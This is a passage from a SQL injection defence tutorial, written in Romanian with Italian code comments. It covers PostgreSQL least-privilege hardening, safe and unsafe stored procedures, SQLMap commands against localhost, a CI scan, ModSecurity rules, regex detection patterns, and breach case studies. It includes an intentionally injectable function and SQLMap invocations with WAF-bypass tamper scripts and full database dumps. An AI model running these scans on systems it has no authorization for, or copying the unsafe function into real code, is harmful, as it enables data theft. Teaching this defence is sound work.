    # user_data e un oggetto tipizzato, non un dict generico
    user = await user_service.create(
        username=user_data.username,
        email=user_data.email,
        password=user_data.password,
        role=user_data.role.value
    )
    return {"id": user.id}

@app.get("/api/products")
async def list_products(pagination: PaginationParams):
    return await product_service.list(
        page=pagination.page,
        limit=pagination.limit,
        sort_by=pagination.sort_by,
        sort_order=pagination.sort_order
    )

Întărirea bazei de date și principiul privilegiului minim

Chiar și cu interogări parametrizate perfect, o bază de date prost configurată amplifică foarte mult daunele unui atac de succes. The principiul cel mai mic privilegiu se asigură că fiecare componentă are doar permisiunile strict necesare funcționării sale.

-- Database Hardening: PostgreSQL come esempio

-- 1. Crea utenti dedicati per ogni ruolo applicativo
-- MAI usare l'utente postgres/root per l'applicazione!

-- Utente per l'applicazione web (solo DML)
CREATE USER app_web WITH PASSWORD 'strong_random_password_here';
GRANT CONNECT ON DATABASE myapp TO app_web;
GRANT USAGE ON SCHEMA public TO app_web;
GRANT SELECT, INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA public TO app_web;
GRANT USAGE, SELECT ON ALL SEQUENCES IN SCHEMA public TO app_web;
-- NO: CREATE TABLE, DROP TABLE, TRUNCATE, ALTER, DDL

-- Utente per reports/analytics (solo SELECT)
CREATE USER app_reports WITH PASSWORD 'another_strong_password';
GRANT CONNECT ON DATABASE myapp TO app_reports;
GRANT USAGE ON SCHEMA public TO app_reports;
GRANT SELECT ON ALL TABLES IN SCHEMA public TO app_reports;
-- NO: INSERT, UPDATE, DELETE, DDL

-- Utente per migrazioni (solo DDL, non in produzione normale)
CREATE USER app_migrations WITH PASSWORD 'migration_password';
GRANT ALL PRIVILEGES ON DATABASE myapp TO app_migrations;
-- Questo utente viene usato SOLO durante le migrazioni, poi disabilitato:
-- ALTER USER app_migrations VALID UNTIL '2025-12-31';

-- 2. Revoca i permessi di default
REVOKE ALL ON SCHEMA public FROM PUBLIC;
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- 3. Proteggi tabelle sensibili
-- Crea una view mascherata per dati sensibili
CREATE VIEW users_public AS
  SELECT id, username, email, role, created_at
  FROM users;
  -- Esclude: password_hash, reset_token, 2fa_secret

-- Revoca accesso diretto alla tabella users per app_reports
REVOKE SELECT ON users FROM app_reports;
-- Concedi accesso solo alla view
GRANT SELECT ON users_public TO app_reports;

-- 4. Abilita Row Level Security (RLS) per isolamento multi-tenant
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

CREATE POLICY documents_tenant_isolation ON documents
  USING (tenant_id = current_setting('app.current_tenant_id')::integer);

-- In PostgreSQL, imposta il tenant prima delle query:
-- SET app.current_tenant_id = '123';

-- 5. Disabilita funzioni pericolose
REVOKE EXECUTE ON FUNCTION pg_read_file(text) FROM PUBLIC;
REVOKE EXECUTE ON FUNCTION pg_ls_dir(text) FROM PUBLIC;
-- Su MySQL/MariaDB:
-- REVOKE FILE ON *.* FROM 'app_web'@'%';

-- 6. Audit log per query sospette (PostgreSQL)
-- Installa pgaudit e configura in postgresql.conf:
-- shared_preload_libraries = 'pgaudit'
-- pgaudit.log = 'all'
-- pgaudit.log_relation = on

Proceduri stocate securizate

Procedurile stocate, atunci când sunt utilizate corect, adaugă un strat suplimentar de apărare: ele încapsulează logica SQL în baza de date și limitează interfața disponibilă pentru aplicație. Cu toate acestea, pot fi vulnerabili dacă construiesc SQL dinamic intern.

-- Stored Procedure SICURA in PostgreSQL
-- Le SP fisse (non dynamic SQL) sono immuni a SQL injection

CREATE OR REPLACE FUNCTION authenticate_user(
  p_username VARCHAR(50),
  p_password_hash VARCHAR(255)
)
RETURNS TABLE(user_id INT, role VARCHAR(20))
LANGUAGE plpgsql
SECURITY DEFINER  -- Esegue con i permessi del definer (DBA), non del chiamante
AS $
BEGIN
  -- Query statica con parametri: impossibile iniettare SQL
  RETURN QUERY
    SELECT u.id, u.role
    FROM users u
    WHERE u.username = p_username
      AND u.password_hash = p_password_hash
      AND u.is_active = TRUE;

  -- Log del tentativo (senza esporre la password)
  INSERT INTO auth_audit_log (username, attempt_time, success)
  VALUES (p_username, NOW(), FOUND);
END;
$;

-- Concedi EXECUTE solo all'utente applicativo
GRANT EXECUTE ON FUNCTION authenticate_user TO app_web;
-- Revoca accesso diretto alla tabella users!
REVOKE SELECT ON users FROM app_web;

-- VULNERABILE: stored procedure con SQL dinamico
CREATE OR REPLACE FUNCTION search_products_UNSAFE(p_search TEXT)
RETURNS SETOF products
LANGUAGE plpgsql AS $
DECLARE
  v_query TEXT;
BEGIN
  -- MAI costruire SQL dinamico con input utente!
  v_query := 'SELECT * FROM products WHERE name LIKE ''%' || p_search || '%''';
  RETURN QUERY EXECUTE v_query;  -- Vulnerabile!
END;
$;

-- SICURO: stored procedure con SQL dinamico e parametri
CREATE OR REPLACE FUNCTION search_products_safe(p_search TEXT)
RETURNS SETOF products
LANGUAGE plpgsql AS $
BEGIN
  -- EXECUTE ... USING passa i parametri in modo sicuro
  RETURN QUERY EXECUTE
    'SELECT * FROM products WHERE name LIKE $1'
    USING '%' || p_search || '%';  -- Parametro sicuro
END;
$;

SQLMap: Testează-ți aplicația înainte de atacatori

SQLMap și cel mai utilizat instrument open source pentru testarea automată a injecției SQL. Suportă MySQL, PostgreSQL, Microsoft SQL Server, Oracle și multe alte SGBD. Folosește-l numai pe sistemele pe care le dețineți sau cu autorizație scrisă explicită.

# SQLMap: comandi essenziali per penetration testing

# Test base su un URL con parametro GET
sqlmap -u "https://localhost:3000/api/products?id=1" --batch

# Test con autenticazione (cookie di sessione)
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --cookie="session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
  --batch

# Test su richiesta POST con body JSON
sqlmap -u "https://localhost:3000/api/login" \
  --data='{"username":"test","password":"test"}' \
  --content-type="application/json" \
  --batch

# Test più aggressivo: tutte le tecniche di injection
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --level=5 \          # Livello di test (1-5)
  --risk=3 \           # Rischio di danni (1-3, usa 2 in test)
  --technique=BEUST \  # Tutte le tecniche: Boolean, Error, Union, Stacked, Time
  --batch

# Dump dello schema (solo se vulnerabile, a scopo dimostrativo)
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --dbs \          # Lista dei database
  --tables \       # Lista delle tabelle
  --dump-all \     # Dump completo (USARE CON CAUTELA)
  --batch

# Test con tamper script per bypass WAF
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --tamper=space2comment,between,randomcase \
  --batch

# Genera report HTML
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --batch \
  --output-dir=/tmp/sqlmap-report

# Test su file di richiesta HTTP (catturata con Burp Suite)
# Salva la richiesta in request.txt:
# GET /api/products?id=1 HTTP/1.1
# Host: localhost:3000
# Cookie: session=...
sqlmap -r request.txt --batch

Integrați SQLMap în CI/CD

Pentru a automatiza testarea, integrați SQLMap într-o conductă de staging. Un exemplu cu GitHub Actions:

# .github/workflows/security-test.yml
name: Security Tests - SQL Injection

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]

jobs:
  sqlmap-scan:
    runs-on: ubuntu-latest
    services:
      app:
        image: myapp:${{ github.sha }}
        ports:
          - 3000:3000
        env:
          DATABASE_URL: postgresql://test:test@postgres/testdb

      postgres:
        image: postgres:15
        env:
          POSTGRES_PASSWORD: test
          POSTGRES_USER: test
          POSTGRES_DB: testdb

    steps:
      - uses: actions/checkout@v4

      - name: Install SQLMap
        run: pip install sqlmap

      - name: Wait for app to be ready
        run: |
          timeout 30 bash -c 'until curl -s http://localhost:3000/health; do sleep 1; done'

      - name: Run SQLMap against API endpoints
        run: |
          sqlmap \
            -u "http://localhost:3000/api/products?id=1" \
            --batch \
            --level=3 \
            --risk=1 \
            --output-dir=./sqlmap-results \
            --format=json \
            --no-logging

      - name: Check for vulnerabilities
        run: |
          # Fallisce la build se SQLMap trova vulnerabilità
          if grep -q '"vulnerable": true' ./sqlmap-results/*.json 2>/dev/null; then
            echo "CRITICAL: SQL Injection vulnerability found!"
            cat ./sqlmap-results/*.json
            exit 1
          fi

      - name: Upload results
        uses: actions/upload-artifact@v4
        if: always()
        with:
          name: sqlmap-report
          path: ./sqlmap-results/

WAF și Runtime Protection

Un Web Application Firewall (WAF) adaugă un strat de apărare în fața aplicației, analizând cererile HTTP pentru a detecta modele de atac cunoscute. Nu înlocuiește codul securizat, dar reduce riscul de atacuri automate și zero-days.

# Configurazione WAF con ModSecurity (Apache/Nginx) + OWASP CRS

# nginx.conf - Abilita ModSecurity
server {
    listen 443 ssl;
    server_name api.example.com;

    # Abilita ModSecurity
    modsecurity on;
    modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;

    # OWASP Core Rule Set
    include /etc/nginx/modsecurity/crs/crs-setup.conf;
    include /etc/nginx/modsecurity/crs/rules/*.conf;

    location / {
        proxy_pass http://localhost:3000;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

# modsecurity.conf - Configurazione base
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Regola custom per proteggere endpoint critico
SecRule ARGS "@rx (union|select|insert|delete|update|drop|create)" \
    "id:1001,\
    phase:2,\
    block,\
    capture,\
    t:lowercase,\
    log,\
    msg:'Possible SQL Injection',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'attack-sqli',\
    severity:'CRITICAL'"

# Rate limiting per prevenire brute force e scanning
limit_req_zone $binary_remote_addr zone=api:10m rate=100r/m;
limit_req_zone $binary_remote_addr zone=login:10m rate=10r/m;

server {
    location /api/ {
        limit_req zone=api burst=20 nodelay;
        limit_req_status 429;
    }

    location /api/auth/login {
        limit_req zone=login burst=5 nodelay;
        limit_req_status 429;
    }
}

// Runtime protection in Node.js con Helmet e express-rate-limit
import express from 'express';
import helmet from 'helmet';
import rateLimit from 'express-rate-limit';
import { sqlInjectionGuard } from './middleware/sql-injection-guard';

const app = express();

// 1. Helmet: header di sicurezza HTTP
app.use(helmet({
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      scriptSrc: ["'self'"],
      styleSrc: ["'self'", "'unsafe-inline'"],
    },
  },
  referrerPolicy: { policy: 'strict-origin-when-cross-origin' },
}));

// 2. Rate limiting globale
const globalLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,  // 15 minuti
  max: 1000,                  // Massimo 1000 richieste per IP
  standardHeaders: true,
  legacyHeaders: false,
  message: { error: 'Troppe richieste, riprova tra 15 minuti' },
});

const authLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,
  max: 10,  // Solo 10 tentativi di login per 15 minuti
  skipSuccessfulRequests: true,
  message: { error: 'Troppi tentativi di accesso, account temporaneamente bloccato' },
});

app.use('/api/', globalLimiter);
app.use('/api/auth/', authLimiter);

// 3. Middleware custom per rilevare pattern SQL injection
function sqlInjectionGuard(req, res, next) {
  const suspiciousPatterns = [
    /(\bUNION\b.*\bSELECT\b)/i,
    /(\bSELECT\b.*\bFROM\b)/i,
    /('.*\bOR\b.*'.*=.*')/i,
    /(\bDROP\b.*\bTABLE\b)/i,
    /--\s*$/m,
    /;\s*$/,
    /\/\*.*\*\//,
    /\bEXEC\b.*\(/i,
    /\bCAST\b.*\bAS\b/i,
  ];

  const checkValue = (value) => {
    if (typeof value === 'string') {
      return suspiciousPatterns.some(pattern => pattern.test(value));
    }
    if (typeof value === 'object' && value !== null) {
      return Object.values(value).some(checkValue);
    }
    return false;
  };

  const sources = [req.body, req.query, req.params];
  const isSuspicious = sources.some(checkValue);

  if (isSuspicious) {
    // Log dettagliato per il team di sicurezza
    console.warn('Possible SQL injection attempt:', {
      ip: req.ip,
      method: req.method,
      url: req.url,
      timestamp: new Date().toISOString(),
    });
    // Risposta generica per non rivelare informazioni
    return res.status(400).json({ error: 'Richiesta non valida' });
  }

  next();
}

app.use('/api/', sqlInjectionGuard);

Studiu de caz: Atacuri reale 2023-2025

MOVEit Transfer (CVE-2023-34362) - Încălcarea anului

În mai 2023, o injecție SQL critică în software-ul de transfer de fișiere MOVEit Transfer de Progress Software a provocat una dintre cele mai grave breșe de date din istoria recentă. Vulnerabilitatea (CVE-2023-34362, CVSS 9.8) a permis atacatorilor să injecteze SQL prin parametri HTTP, să ocolească autentificarea și să execute comenzi arbitrare pe server.

Impactul a fost devastator: 11,3 milioane de dosare ale pacienților furate de la Maximus, încălcări ale Departamentului de Energie al SUA, Biroului pentru Autovehicule din Louisiana și alte sute de organizații. Grupul de ransomware Cl0p a exploatat vulnerabilitatea pentru a stoarce bani de la peste 2.000 de organizații din întreaga lume. Procesele de acțiune colectivă au continuat până în 2024.

Vulnerabilitatea se afla într-un parametru HTTP invalidat care a fost concatenat direct într-o interogare SQL pentru a verifica sesiunile. O singură linie de cod nesigur a generat daune de miliarde de dolari.

TSA FlyCASS (2024) - Vulnerabilități în infrastructura critică

În 2024, cercetătorii de securitate Ian Carroll și Sam Curry au descoperit o injecție SQL în sistem FlyCASS, folosit de TSA (Transportation Security Administration) din Statele Unite pentru a verifica membrii echipajului companiilor aeriene. Vulnerabilitatea ar fi putut permite unui atacator să adauge nume arbitrare în baza de date a personalului autorizat, ocolind eventualele verificări de securitate din aeroport.

Campania Resume Looters (2024)

Grupul Resume Looters a compromis peste 65 de site-uri de recrutare și de vânzare cu amănuntul folosind injecție SQL și atacuri XSS. Au furat milioane de înregistrări ale candidaților, inclusiv date personale, CV-uri și informații de contact. Acest caz demonstrează modul în care injecția SQL este încă utilizată cu succes în aplicațiile de producție în 2024.

Lecții din studiile de caz

În toate aceste cazuri, vulnerabilitatea a fost simplu de remediat din punct de vedere tehnic: o declarație pregătită în loc de o concatenare de șiruri. Costul real nu este remedierea erorii, ci prejudiciul reputațional, juridic și financiar care rezultă. Securitatea ar trebui să fie integrată în timpul dezvoltării, nu adăugată după încălcare.

Listă de verificare specifică unghiulară pentru securitatea backend

Dacă dezvoltați cu Angular și aveți un backend Node.js/NestJS, iată controalele specifice de integrat:

// NestJS - Configurazione sicura con TypeORM

// 1. Usa TypeORM Repository API, evita query builder con interpolazione
@Injectable()
export class UserRepository {
  constructor(
    @InjectRepository(User)
    private readonly repository: Repository<User>,
  ) {}

  // SICURO: find() con TypeORM genera query parametrizzate
  async findByEmail(email: string): Promise<User | null> {
    return this.repository.findOne({ where: { email } });
  }

  // SICURO: QueryBuilder con parametri nominati
  async searchUsers(search: string, role: UserRole): Promise<User[]> {
    return this.repository
      .createQueryBuilder('user')
      .where('user.username LIKE :search AND user.role = :role', {
        search: `%${search}%`,
        role,
      })
      .select(['user.id', 'user.username', 'user.email'])
      .take(50)
      .getMany();
  }
}

// 2. ValidationPipe globale con class-validator
import { ValidationPipe } from '@nestjs/common';

// main.ts
async function bootstrap() {
  const app = await NestFactory.create(AppModule);

  // Abilita validazione globale con whitelist
  app.useGlobalPipes(new ValidationPipe({
    whitelist: true,       // Rimuove proprietà non dichiarate nel DTO
    forbidNonWhitelisted: true,  // Errore se ci sono proprietà extra
    transform: true,       // Trasforma automaticamente i tipi
    transformOptions: {
      enableImplicitConversion: true,
    },
  }));

  await app.listen(3000);
}

// 3. DTO con class-validator
import { IsString, IsEmail, MinLength, MaxLength, Matches } from 'class-validator';
import { Transform } from 'class-transformer';

export class CreateUserDto {
  @IsString()
  @MinLength(3)
  @MaxLength(50)
  @Matches(/^[a-zA-Z0-9_-]+$/, {
    message: 'Username deve contenere solo lettere, numeri, underscore e trattino',
  })
  @Transform(({ value }) => value?.trim().toLowerCase())
  username: string;

  @IsEmail()
  @Transform(({ value }) => value?.trim().toLowerCase())
  email: string;

  @IsString()
  @MinLength(8)
  @MaxLength(128)
  @Matches(
    /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])[A-Za-z\d@$!%*?&]/,
    { message: 'Password troppo debole' }
  )
  password: string;
}

Cele mai bune practici: rezumat

Practica	Prioritate	Impact
Interogări parametrizate / Declarații pregătite	CRITICĂ	Previne injectarea SQL clasică și de ordinul doi
Validarea intrărilor cu schema (Zod/Pydantic)	RIDICAT	Respingeți intrarea malformată înainte de a ajunge în DB
API ORM standard (evita interogările brute)	RIDICAT	Reduce riscul de injectare de ORM
Principiul DB al cel mai mic privilegiu	RIDICAT	Limitează daunele dacă un atac reușește
Dezinfectare NoSQL (express-mongo-sanitize)	RIDICAT	Previne injectarea operatorului NoSQL
Proceduri stocate (opțional)	MEDIE	Încapsulează logica SQL, reduce suprafața de atac
WAF (ModSecurity + OWASP CRS)	MEDIE	Blochează atacurile cunoscute înainte ca acestea să ajungă în aplicație
Limitarea ratei la punctele finale critice	MEDIE	Previne forța brută și scanarea automată
SQLMap pe CI/CD	MEDIE	Detectează automat regresiile de securitate
Gestionarea erorilor generice (fără urmărire a stivei)	MEDIE	Nu dezvăluie informații utile atacatorilor
Jurnalele de audit ale bazei de date	SCĂZUT	Permite criminalistica în cazul unei încălcări

Anti-modele comune

Greșeli frecvente de evitat

Concatenarea șirurilor în interogări: Chiar și o singură apariție poate compromite întreaga aplicație.
Aveți încredere în datele care provin din baza de date: Datele care provin din DB pot conține încărcături utile injectate anterior (injecție de ordinul doi).
Utilizați utilizatorul root al bazei de date pentru aplicație: În cazul unei încălcări, atacatorul va avea acces deplin la server.
Afișați erorile detaliate ale bazei de date în producție: Mesajele de eroare dezvăluie structura DB, versiunea și alte date utile atacatorului.
Crezând că ORM rezolvă totul: Metodele de interogare brută ORM ($queryRawUnsafe, query() cu interpolare) sunt la fel de vulnerabili.
Uitați validarea tipului: Un câmp care ar trebui să fie un număr întreg, dar care acceptă obiecte JSON și este vulnerabil la injecția NoSQL.
Nu testați securitatea în CI/CD: SQLMap și alte instrumente pot fi integrate în conductă pentru a detecta regresiile.

Concluzii și pașii următori

Injecția SQL rămâne una dintre cele mai concrete și de impact amenințări la adresa aplicațiilor web în 2025. Vestea bună este că contramăsurile sunt bine definite și relativ simplu de implementat: interogări parametrizate, validarea intrărilor e principiul cel mai mic privilegiu ele formează o triadă defensivă eficientă împotriva marii majorități a atacurilor.

Cazurile MOVEit, FlyCASS și ResumeLooters demonstrează că problema nu este complexitatea tehnică a vulnerabilităților, ci lipsa disciplinelor de securitate integrate în procesul de dezvoltare. Cu modelele ilustrate în acest articol, puteți elimina în mod sistematic această clasă de vulnerabilități din codul dvs.

Următorul articol din serie trateazăautentificare sigură cu sesiuni și cookie-uri: Un alt pilon cheie al securității backend. Dacă aveți întrebări sau doriți să aflați mai multe despre un caz anume, scrieți în comentarii.

Articole similare din seria Web Security

OWASP Top 10 2025: Ghid pentru dezvoltatori - Contextul general al vulnerabilităților web
XSS, CSRF și CSP: Securitate Frontend - Omologul frontend al securității
Autentificare sigură: sesiune și cookie-uri - Următorul în serie
Securitate API: OAuth 2.1, JWT și Rate Limiting - Securitate API REST